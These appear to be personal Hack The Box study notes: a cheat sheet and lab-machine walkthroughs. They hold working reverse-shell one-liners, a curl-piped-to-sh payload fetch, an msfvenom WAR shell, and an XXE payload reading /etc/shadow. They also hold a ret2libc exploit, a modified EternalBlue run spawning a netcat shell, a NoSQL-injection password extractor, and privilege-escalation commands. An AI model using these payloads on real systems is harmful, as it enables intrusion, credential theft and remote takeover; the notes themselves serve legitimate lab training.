Hack the box

Hack the box

How to connect

1. Download the openvpn configuration
2. install openvpn pacman -S openvpn
3. connect the vpn sudo openvpn /path/to/the/config

Machines similar to OSCP https://docs.google.com/spreadsheets/d/14J_N8bT27H4x4ZKpP-xoKm3OUoDW9cjPlLjn3Ztxuug/edit#gid=1839402159

Interesting links

• Payload all the things
• Hack Tricks
• Crackstation
• Sec List - special dictionaries
• TJNULL Guide to OSCP
• OSCP guide

Techniques

SqlInjection with sqlmap

SqlInjection with sqlmap

1. First we will get the request into a file with burpsuite…
2. sqlmap -r $(pwd)/request_file

Link to original

SMB SHARE - SCF FIle attacks

SMB SHARE - SCF FIle attacks

The idea is that if we can plant a file into a sahred drive,

[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

will send tramas asking for the icon. the file has to have the .scf extension

then we can use responder to listen to this packets

responder -wrf --lm -v

Link to original

Crack with John the ripper

Crack with John the ripper

• lets crack a has md5crypt (from php) or ntlmv2
  • john hashes.txt --wordlist=/usr/share/dict/rockyou.txt --format=md5crypt-long

Link to original

WAR upload reverse shell

WAR upload reverse shell

• if we are in a tomcat environment
  • there is the management/html and management/text
  • that allow to upload new applications
  • we can create a malicious war file https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat
  • msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.103 LPORT=4242 -f war > reverse.war
  • now open a nc to listen
    • sudo nc -nvlp 4242 -vvv

Link to original

Fuzzing

Fuzzing

• allow to enumerate urls in a system
• wfuzz -w /usr/share/dict/directory-list-2.3-medium.txt --hc 404 http://10.10.11.101/FUZZ
• you can also do it for specific extensions:
• wfuzz -w /usr/share/dict/directory-list-2.3-medium.txt --hc 404 http://10.10.11.101/FUZZ.php

Link to original

Port discovering

Port discovering

• nmap sudo nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts
  • 80, 135, 445, 5985
• nmap nmap -sC -sV -p80,135,445,5985 10.10.11.106 -oN ports

Link to original

Reverse tunnel with chisel

Reverse tunnel with chisel

to install chisel

1. git clone git@github.com:jpillora/chisel.git
2. CGO_ENABLED=0 go build ⇐ to build chasel as static binary

• In the attacker box ./chisel server -p 9090 --reverse
• In the victim box ./chisel client 10.10.14.6 -p 9000 R:8086:127.0.01:8086

Link to original

Escalation Basics SUID-SUDO

Escalation Basics SUID/SUDO

• Find SUID binaries find / -perm -4000 2>/dev/null
• Find what I can do SUDO sudo -l

Bingo, there is an executable that we can do sudo without password!

    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

Link to original

XEE (Xml Entity exploit )

XEE (Xml Entity exploit )

• if the remote server is parsing an xml of our own…
• we can use xmlentity to read internal files
• https://github.com/payloadbox/xxe-injection-payload-list

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

the &ent; is replaced with the content of the file

Link to original

Reverse shell (bash)

Reverse shell (bash)

1. Open a local netcat listening to 443 sudo nc -nvlp 443
2. execute the reverse shell (bash) bash -i >& /dev/tcp/10.10.15.103/443 0>&1
3. If didn’t work you can try using this : remember that htb doesn’t have access to internet so you have to host it :)

On the target machine, pipe the output of [https://reverse-shell.sh/yourip:port](https://reverse-shell.sh/yourip:port) into sh.

curl https://reverse-shell.sh/192.168.0.69:1337 | sh

Link to original

Use of metasploit

Use of metasploit

search cve:2007-244
use  exploit/multi/samba/usermap_script
options
set rhost 10.10.10.3
set lhost 10.10.14.6
exploit

Link to original

Juicy Potate -- Windows escalation

Juicy Potate — Windows escalation

we do whoami /priv if we see the SeImpersonatePrivilege or SeAssignPrimaryToken enabled… then we can use Juicy potato https://github.com/ohpe/juicy-potato to get administrator access

Link to original

Eternal blue

Eternal blue

vulnerability in smb CVE-2017-0144 — https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144

The NSA allegedly spent almost a year hunting for a bug in Microsoft’s software. Once they found it, the NSA developed EternalBlue to exploit the vulnerability. The NSA used EternalBlue for five years before alerting Microsoft of its existence.

to know if the machine is vulnerable

$ nmap -p445 --script smb-vuln-\* 10.10.10.40

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

see Machine Blue - Easy - Windows to how to exploit it

Link to original

Linux process pooling

Linux process pooling

Sometimes it’s interesting to know what is running in a cron job, one way is to use pspy https://github.com/DominicBreuker/pspy

Link to original

Escaping Docker container

Escaping Docker container

capsh to see which capacities we have

capsh --print shows that I have cap_sys_module

with this privilege we can insert new kernel modules ⇒ we crafted a kernel module that gives us a reverse shell.. https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_module

Link to original

Buffer overflow - linux

Buffer overflow - linux

• lets copy the binary to our machine to do it better :)

• install gef for gdb

  • to see the protections of the binary checksec in gdb
  • we have NX activated ⇐ meaning we cannot execute code in the stack
  • pattern create give you a pattern
  • run "<pattern here>"
  • pattern offset $eip ← shows we have a 52 bytes to exploit

• ret2libc since we have NX active (stack execution protection) → we need to use

  • we need addr for system /bin/sh and exit
  • in the victim machine we can 1 get the base addr of libcc
    • ldd <binary> → 0xb7e1900
  • get the offsets of system and exit
    • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
    • we get the value of the system@@GLIBC_2.0 → 0003ada0
    • exit → 0002e9d0
    • to get the offset of a /bin/sh occurence:
      • strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh → 15ba0b
  • to get the full address of the
  • ret2libc = addr_of_system + addr_of_exit + addr_of_bin_sh

• is aslr active? cat /proc/sys/kernel/randomize_va_space (0 means no, 2 means yes)

buffer script as s4vitar

from struct import pack
from subprocess import call

RELLENO = "A"*52

base = 0xb7e19000
system_off =  0x0003ada0
exit_off = 0x0002e9d0
sh_off = 0x15ba0b


system = base + system_off
_exit = exit_off + base
sh = sh_off + base

payload = RELLENO + pack("<I", system) + pack("<I", _exit) + pack("<I", sh)

call(["/home/ayush/.binary/rop", payload])
print(payload)

Link to original

Machines - Retired

Lame Machine (easy)

Lame Machine (easy)

• nmap: 139,445,22,21,
• Seems like theres no icmp (firewall rules)
• FTP anonymous allowed…
• lets see the ftp
  • I found nothing interesing
  • lets see if there is an exploit for this version of the ftpd
  • there is a exploit but doesnt seems to work
• smb
  • seems to have an exploit as well
  • lets go to msfconsole

search cve:2007-244
use  exploit/multi/samba/usermap_script
options
set rhost 10.10.10.3
set lhost 10.10.14.6
exploit

Link to original

Machine Shocker - Easy

Machine Shocker - Easy

NMAP

80/tcp   open  http         syn-ack ttl 63
2222/tcp open  EtherNetIP-1 syn-ack ttl 63

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

• fuzz on the port 80
  • HINT :( there is cgi-bin
  • I didn’t found it cause I did not put the final / in the FUZZ
  • maybe we should run wfuzz and dirb
  • HINT: there is an exploit when we see a script in there like user.sh
  • got reverse shell
  • sudo -l show that I can run perl as root
  • sudo perl -e ‘exec “chmod u+s /bin/bash”;’
• ssh is using OpenSSH 7.2
  • it shows there is a username enumeration vuln
  • lets try it out…
  • nothing found in there

Link to original

Machine - Bashed - Easy - Linux

Machine - Bashed - Easy - Linux

80/tcp open  http    syn-ack ttl 63

Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-20 17:25 CEST
Nmap scan report for 10.10.10.68
Host is up (0.034s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

in the webpage, talks about a phpbash project, like an shell interface…

lets wfuzz

000000164:   301        9 L      28 W       312 Ch      "uploads"
000000338:   301        9 L      28 W       308 Ch      "php"
000000550:   301        9 L      28 W       308 Ch      "css"
000000834:   301        9 L      28 W       308 Ch      "dev"
000000953:   301        9 L      28 W       307 Ch      "js"
000002771:   301        9 L      28 W       310 Ch      "fonts"

in the php folder there is a http://10.10.10.68/php/sendMail.php in the js folder there is a js, that actually sends a json via post to the sendMail.php

 var params = {
            'action': 'SendMessage',
            'name': jQuery('#name').val(),
            'email': jQuery('#contact-email').val(),
            'subject': jQuery('#subject').val(),
            'message': jQuery('#message').val()
        };
        jQuery.ajax({
            type: "POST",
            url: "php/sendMail.php",
            data: params,
            success: function (response) {
                if (response) {
                    var responseObj = jQuery.parseJSON(response);
                    if (responseObj.ResponseData)
                    {
                        alert(responseObj.ResponseData);
                    }
                }
            },

in the dev folder we found the phpbash.php - we got a shell!

root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false  
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false  
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false  
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false  
syslog:x:104:108::/home/syslog:/bin/false  
_apt:x:105:65534::/nonexistent:/bin/false  
messagebus:x:106:110::/var/run/dbus:/bin/false  
uuidd:x:107:111::/run/uuidd:/bin/false  
arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash  
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash

User www-data may run the following commands on bashed:  
(scriptmanager : scriptmanager) NOPASSWD: ALL

• we did a reverse shell to better work with a terminal

$ sudo -u scriptmanager bash
sudo -u scriptmanager bash

• there is a /scripts folder that has a test.py that writes to a file test.txt. but the test.txt is owned by root :thinking:

Link to original

Machine - Nibbles - Easy - Linux

Machine - Nibbles - Easy - Linux

• tags:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• in the http:
  • there is a subfolder named nibbleblog
  • in metasploit says there is multiple sql injections

  http://www.example.com/index.php?page=[SQLi]
  http://www.example.com/post.php?idpost=[SQLi]
  

  • nothing in there…
  • I tested the admin folder and I could see all the code
  • there is a path http://10.10.10.75/nibbleblog/README where you can see the version is 4.0.3
  • and searchsploit there is a specific arbitrary file upload
• let’s try to upload a shell using the vulnerability
  • we cannot cause we need a user first
• there is this function in the code we can see

  // =====================================================================
  //	POST
  // =====================================================================
  if( $_SERVER['REQUEST_METHOD'] == 'POST' )
  {
  	$new_salt = Text::random_text(11);
  	$new_hash = Crypt::get_hash($_POST['pw_new'],$new_salt);
  	$text = '<?php $_USER[0]["uid"] = "0"; $_USER[0]["username"] = "'.$_USER[0]['username'].'"; $_USER[0]["password"] = "'.$new_hash.'"; $_USER[0]["salt"] = "'.$new_salt.'"; $_USER[0]["email"] = "'.$_USER[0]['email'].'"; ?>';
  	$file = fopen(FILE_SHADOW, 'w');
  	fputs($file, $text);
  	fclose($file);
  	Session::set_alert($_LANG['PASSWORD_HAS_BEEN_CHANGED_SUCCESSFULLY']);
  	// Redirect to Dashboard
  	Redirect::controller('admin','dashboard','view');
  }
  

  • download the whole code with wget --spider --recursive $URL
  • al final el password era admin:nibbles
• now with metasploit and the vulnerability we know exist but we need a user, we can continue the explotation :)
  • we got the shelll
• in the home of the nibbler, we found a personal.zip that contains a php script
• if we do a sudo -l
• we see we can execute as root the file decompressed…
• I just did change the content with a chmod u+s /bin/bash
• sudo

Link to original

Machine beep - Easy - Linux - abandoned

Machine beep - Easy - Linux - abandoned

Host is up, received user-set (0.043s latency).
Scanned at 2021-10-20 22:21:44 CEST for 12s
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE          REASON
22/tcp    open  ssh              syn-ack ttl 63
25/tcp    open  smtp             syn-ack ttl 63
80/tcp    open  http             syn-ack ttl 63
110/tcp   open  pop3             syn-ack ttl 63
111/tcp   open  rpcbind          syn-ack ttl 63
143/tcp   open  imap             syn-ack ttl 63
443/tcp   open  https            syn-ack ttl 63
878/tcp   open  unknown          syn-ack ttl 63
993/tcp   open  imaps            syn-ack ttl 63
995/tcp   open  pop3s            syn-ack ttl 63
3306/tcp  open  mysql            syn-ack ttl 63
4190/tcp  open  sieve            syn-ack ttl 63
4445/tcp  open  upnotifyp        syn-ack ttl 63
4559/tcp  open  hylafax          syn-ack ttl 63
5038/tcp  open  unknown          syn-ack ttl 63
10000/tcp open  snet-sensor-mgmt syn-ack ttl 63

Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-20 21:51 CEST
Nmap scan report for 10.10.10.7
Host is up (0.044s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
3306/tcp open  mysql      MySQL (unauthorized)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
4445/tcp open  upnotifyp?

• port 111 (trying to see which rpc endoint)

  PORT      STATE SERVICE    VERSION
  22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
  | ssh-hostkey:
  |   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
  |_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
  25/tcp    open  smtp       Postfix smtpd
  |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
  80/tcp    open  http       Apache httpd 2.2.3
  |_http-server-header: Apache/2.2.3 (CentOS)
  |_http-title: Did not follow redirect to https://10.10.10.7/
  110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
  |_sslv2: ERROR: Script execution failed (use -d to debug)
  |_ssl-date: ERROR: Script execution failed (use -d to debug)
  |_pop3-capabilities: PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE TOP RESP-CODES UIDL APOP USER STLS LOGIN-DELAY(0) EXPIRE(NEVER)
  |_ssl-cert: ERROR: Script execution failed (use -d to debug)
  |_tls-alpn: ERROR: Script execution failed (use -d to debug)
  |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
  111/tcp   open  rpcbind    2 (RPC #100000)
  | rpcinfo:
  |   program version    port/proto  service
  |   100000  2            111/tcp   rpcbind
  |   100000  2            111/udp   rpcbind
  |   100024  1            875/udp   status
  |_  100024  1            878/tcp   status
  143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
  |_tls-alpn: ERROR: Script execution failed (use -d to debug)
  |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
  |_ssl-cert: ERROR: Script execution failed (use -d to debug)
  |_imap-capabilities: ANNOTATEMORE IMAP4rev1 URLAUTHA0001 OK X-NETSCAPE Completed BINARY UIDPLUS IMAP4 NAMESPACE IDLE LIST-SUBSCRIBED MAILBOX-REFERRALS UNSELECT LISTEXT ID SORT=MODSEQ CATENATE RENAME THREAD=REFERENCES QUOTA NO THREAD=ORDEREDSUBJECT ACL CONDSTORE SORT ATOMIC MULTIAPPEND CHILDREN STARTTLS RIGHTS=kxte LITERAL+
  |_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
  |_ssl-date: ERROR: Script execution failed (use -d to debug)
  |_sslv2: ERROR: Script execution failed (use -d to debug)
  443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
  | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
  | Not valid before: 2017-04-07T08:22:08
  |_Not valid after:  2018-04-07T08:22:08
  |_ssl-date: 2021-10-20T20:32:50+00:00; +15s from scanner time.
  |_http-server-header: Apache/2.2.3 (CentOS)
  | http-robots.txt: 1 disallowed entry
  |_/
  |_http-title: Elastix - Login page
  878/tcp   open  status     1 (RPC #100024)
  993/tcp   open  ssl/imap   Cyrus imapd
  |_imap-capabilities: CAPABILITY
  995/tcp   open  pop3       Cyrus pop3d
  |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
  |_ssl-known-key: ERROR: Script execution failed (use -d to debug)
  |_tls-alpn: ERROR: Script execution failed (use -d to debug)
  |_ssl-date: ERROR: Script execution failed (use -d to debug)
  |_ssl-cert: ERROR: Script execution failed (use -d to debug)
  |_sslv2: ERROR: Script execution failed (use -d to debug)
  4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
  4445/tcp  open  upnotifyp?
  4559/tcp  open  hylafax    HylaFAX 4.3.10
  5038/tcp  open  asterisk   Asterisk Call Manager 1.1
  10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
  |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
  Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
  

• port 3306

  • if I connect via nc, it says jHost '10.10.14.6' is not allowed to connect to this MySQL serverTotal received bytes: 71

• 110

  • lets see if we can see mails Cyrus POP3 v2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 server

• port 10000

  • another admin page

• 5038

  • maybe it’s exploitable ?
  • https://github.com/EnableSecurity/sipvicious

  $ svmap  10.10.10.7
  +-----------------+---------------------+
  | SIP Device      | User Agent          |
  +=================+=====================+
  | 10.10.10.7:5060 | FPBX-2.8.1(1.8.7.0) |
  +-----------------+---------------------+
  

  svwar 10.10.10.7 
  

  -p
  

Link to original

Machine Blue - Easy - Windows

Machine Blue - Easy - Windows

PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack ttl 127
139/tcp   open  netbios-ssn  syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
49152/tcp open  unknown      syn-ack ttl 127
49153/tcp open  unknown      syn-ack ttl 127
49154/tcp open  unknown      syn-ack ttl 127
49155/tcp open  unknown      syn-ack ttl 127
49156/tcp open  unknown      syn-ack ttl 127
49157/tcp open  unknown      syn-ack ttl 127

Host script results:
| smb2-time:
|   date: 2021-10-21T15:07:21
|_  start_date: 2021-10-21T15:04:53
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-10-21T16:07:24+01:00
|_clock-skew: mean: -19m40s, deviation: 34m36s, median: 17s

$ nmap -p445 --script smb-vuln-\* 10.10.10.40

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

lets clone the exploit https://github.com/worawit/MS17-010

 python2 checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

denied, but nmap used the guest user… let’s try it out

 python2 checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

now that the checker said it was good to go, let’s try to exploit it!

python2 zzz_exploit.py 10.10.10.40 samr
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa800460c950
SESSION: 0xfffff8a003437060
FLINK: 0xfffff8a0035f4088
InParam: 0xfffff8a0035ee15c
MID: 0x3503
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done

okay… we created a file… let’s see if we can get a reverse shell… there is a line in the exploit that allow us to execute commands instead of creating files

we could create another smb with the nc.exe, and execute it with the shell…

1. download nc.exe from https://github.com/int0x33/nc.exe/
2. create a smb server sudo smbserver.py -smb2support -ip 0.0.0.0 kzk $(pwd)
3. open a netcat listening sudo nc -nvlp 443 -vvv
4. Change the code to use the nc of our samba service_exec(conn, r'\\10.10.14.6\kzk\\nc.exe -e cmd.exe 10.10.14.6 443')
5. execute the exploit! python2 zzz_exploit.py 10.10.10.40 samr

Link to original

Machine Mango - Medium - Linux

Machine Mango - Medium - Linux

• tags nosql-injection suid jjs mongo

PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 63
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds
           Raw packets sent: 65563 (2.885MB) | Rcvd: 65535 (2.621MB)

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn:
|_  http/1.1
|_http-title: Mango | Search Base
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.55 seconds

in the certificate we can see that the vhost seems should be staging-order.mango.htb

• we have two sites one in the 443 and another in the 80

• port 80:

  • it shows a login portal…
  • gobuster
    • vendor/ << maybe is a php mod installed
  • look for other vhosts…
    • nothing

• port 443

  • go buster
    • https://staging-order.mango.htb/analytics.php
    • search splot shows a Remote JSON Reflected XSS
  • look for other vhosts…

• HINT :( -⇒ NoSQL injection in 80

  • wrote a simple python script to get the password of the admin

import requests
import string

current = ""

for i in range(20):
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            r = requests.post("http://staging-order.mango.htb", {
                "username": "admin",
                "password[$regex]": f"^{current}{c}"
            })

            t = r.text
            if "farming" in t:
                current = current + c
                print(current)
                break

print(r.status_code, r.text)

or use the Nosql-MongoDB-injection-username-password-enumeration.git the password t9KcS3>!0B#2 we also found two users admin and mango

2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2

let’s try to log into the ssh ! we got the shell! …

• we see inside there a mongodb

  • nothing in there interesting

• suid show a bunch of files

/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/at
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine

• HINT :( jjs has suid
  • with jjs I wrote a script that give u+s to bash

Link to original

